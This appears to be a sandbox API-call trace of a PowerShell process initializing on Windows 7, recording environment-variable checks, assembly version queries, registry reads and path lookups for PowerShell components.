	[0033.538] GetWindowThreadProcessId (in: hWnd=0x20032, lpdwProcessId=0x25e550 | out: lpdwProcessId=0x25e550) returned 0x450
	[0033.538] GetLastError () returned 0x514
	[0033.538] GetLastError () returned 0x514
	[0033.545] WerSetFlags () returned 0x0
	[0033.638] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0033.641] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e92c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e928 | out: pulNumLanguages=0x25e92c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x25e928) returned 1
	[0033.641] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x25e92c, pwszLanguagesBuffer=0x1fdcdac, pcchLanguagesBuffer=0x25e928 | out: pulNumLanguages=0x25e92c, pwszLanguagesBuffer=0x1fdcdac, pcchLanguagesBuffer=0x25e928) returned 1
	[0033.653] GetUserDefaultLocaleName (in: lpLocaleName=0x190b58, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0033.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.746] GetLastError () returned 0xcb
	[0033.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.748] GetLastError () returned 0xcb
	[0033.750] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.750] GetLastError () returned 0xcb
	[0033.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e39c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.796] GetLastError () returned 0xcb
	[0033.796] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e3b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.796] GetLastError () returned 0xcb
	[0033.796] SetErrorMode (uMode=0x1) returned 0x1
	[0033.796] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x25e838 | out: lpFileInformation=0x25e838*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0033.797] GetLastError () returned 0xcb
	[0033.797] SetErrorMode (uMode=0x1) returned 0x1
	[0033.797] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x25e8bc | out: lpdwHandle=0x25e8bc) returned 0x94c
	[0033.798] GetLastError () returned 0x0
	[0033.798] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1fdf2dc | out: lpData=0x1fdf2dc) returned 1
	[0033.800] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e888, puLen=0x25e884 | out: lplpBuffer=0x25e888*=0x1fdf378, puLen=0x25e884) returned 1
	[0033.800] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf454, puLen=0x25e800) returned 1
	[0033.800] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0033.800] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0033.800] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf4a8, puLen=0x25e800) returned 1
	[0033.800] lstrlenW (lpString="System.Management.Automation") returned 28
	[0033.800] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0033.801] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf504, puLen=0x25e800) returned 1
	[0033.801] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0033.801] lstrcpyW (in: lpString1=0x190b58, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0033.801] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf544, puLen=0x25e800) returned 1
	[0033.801] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0033.801] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0033.801] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf5ac, puLen=0x25e800) returned 1
	[0033.801] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0033.801] lstrcpyW (in: lpString1=0x190b58, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0033.801] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf648, puLen=0x25e800) returned 1
	[0033.801] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0033.801] lstrcpyW (in: lpString1=0x190b58, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0033.801] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf6ac, puLen=0x25e800) returned 1
	[0033.801] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0033.801] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf728, puLen=0x25e800) returned 1
	[0033.802] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0033.802] lstrcpyW (in: lpString1=0x190b58, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x1fdf3d0, puLen=0x25e800) returned 1
	[0033.802] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0033.802] lstrcpyW (in: lpString1=0x190b58, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x0, puLen=0x25e800) returned 0
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x0, puLen=0x25e800) returned 0
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x25e804, puLen=0x25e800 | out: lplpBuffer=0x25e804*=0x0, puLen=0x25e800) returned 0
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x25e7f8, puLen=0x25e7f4 | out: lplpBuffer=0x25e7f8*=0x1fdf378, puLen=0x25e7f4) returned 1
	[0033.802] VerLanguageNameW (in: wLang=0x0, szLang=0x190b58, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0033.802] VerQueryValueW (in: pBlock=0x1fdf2dc, lpSubBlock="\\", lplpBuffer=0x25e80c, puLen=0x25e808 | out: lplpBuffer=0x25e80c*=0x1fdf304, puLen=0x25e808) returned 1
	[0033.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.810] GetLastError () returned 0xcb
	[0033.842] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.842] GetLastError () returned 0xcb
	[0033.846] lstrlenW (lpString="䅁") returned 1
	[0033.851] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e7d0 | out: phkResult=0x25e7d0*=0x300) returned 0x0
	[0033.852] RegOpenKeyExW (in: hKey=0x300, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e7d4 | out: phkResult=0x25e7d4*=0x304) returned 0x0
	[0033.852] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e808 | out: phkResult=0x25e808*=0x308) returned 0x0
	[0033.897] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e848, lpData=0x0, lpcbData=0x25e844*=0x0 | out: lpType=0x25e848*=0x1, lpData=0x0, lpcbData=0x25e844*=0x56) returned 0x0
	[0033.899] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e848, lpData=0x190b58, lpcbData=0x25e844*=0x56 | out: lpType=0x25e848*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x25e844*=0x56) returned 0x0
	[0033.916] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.916] GetLastError () returned 0x0
	[0033.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.918] GetLastError () returned 0x0
	[0033.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0033.981] GetLastError () returned 0x0
	[0033.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0033.992] GetLastError () returned 0xcb
	[0035.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0035.999] GetLastError () returned 0x2
	[0035.999] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0035.999] GetLastError () returned 0x2
	[0036.173] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.173] GetLastError () returned 0xcb
	[0036.174] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.174] GetLastError () returned 0xcb
	[0036.221] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.221] GetLastError () returned 0xcb
	[0036.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.223] GetLastError () returned 0xcb
	[0036.223] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.223] GetLastError () returned 0xcb
	[0036.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0036.557] GetLastError () returned 0x0
	[0036.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0036.557] GetLastError () returned 0x0
	[0036.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.600] GetLastError () returned 0xcb
	[0036.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0036.603] GetLastError () returned 0xcb
	[0036.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0036.656] GetLastError () returned 0x7e
	[0036.656] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0036.656] GetLastError () returned 0x7e
	[0037.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0037.424] GetLastError () returned 0x2
	[0037.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0037.424] GetLastError () returned 0x2
	[0037.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0037.617] GetLastError () returned 0x57
	[0037.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0037.618] GetLastError () returned 0x57
	[0037.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0037.779] GetLastError () returned 0x2
	[0037.779] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0037.779] GetLastError () returned 0x2
	[0037.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0037.980] GetLastError () returned 0x2
	[0037.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x25e310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0037.980] GetLastError () returned 0x2
	[0038.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.063] GetLastError () returned 0xcb
	[0038.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.064] GetLastError () returned 0xcb
	[0038.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.064] GetLastError () returned 0xcb
	[0038.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.065] GetLastError () returned 0xcb
	[0038.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.084] GetLastError () returned 0xcb
	[0038.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x25e31c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0038.135] GetLastError () returned 0x2
	[0038.135] SetErrorMode (uMode=0x1) returned 0x1
	[0038.135] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x25e7c4 | out: lpFileInformation=0x25e7c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0038.135] GetLastError () returned 0x2
	[0038.135] SetErrorMode (uMode=0x1) returned 0x1
	[0038.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e3d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.333] GetLastError () returned 0x0
	[0038.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.333] GetLastError () returned 0x0
	[0038.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x25e388, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0038.335] GetLastError () returned 0x0
	[0038.338] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.338] GetLastError () returned 0xcb
	[0038.340] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.340] GetLastError () returned 0xcb
	[0038.341] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.341] GetLastError () returned 0xcb
	[0038.343] CoCreateGuid (in: pguid=0x25e8a4 | out: pguid=0x25e8a4*(Data1=0x1eeb0874, Data2=0x9266, Data3=0x49a5, Data4=([0]=0x9a, [1]=0x42, [2]=0xca, [3]=0xfd, [4]=0x36, [5]=0x75, [6]=0x4b, [7]=0x32))) returned 0x0
	[0038.350] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.350] GetLastError () returned 0xcb
	[0038.353] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.353] GetLastError () returned 0xcb
	[0038.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x190b58, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0038.355] GetLastError () returned 0xcb
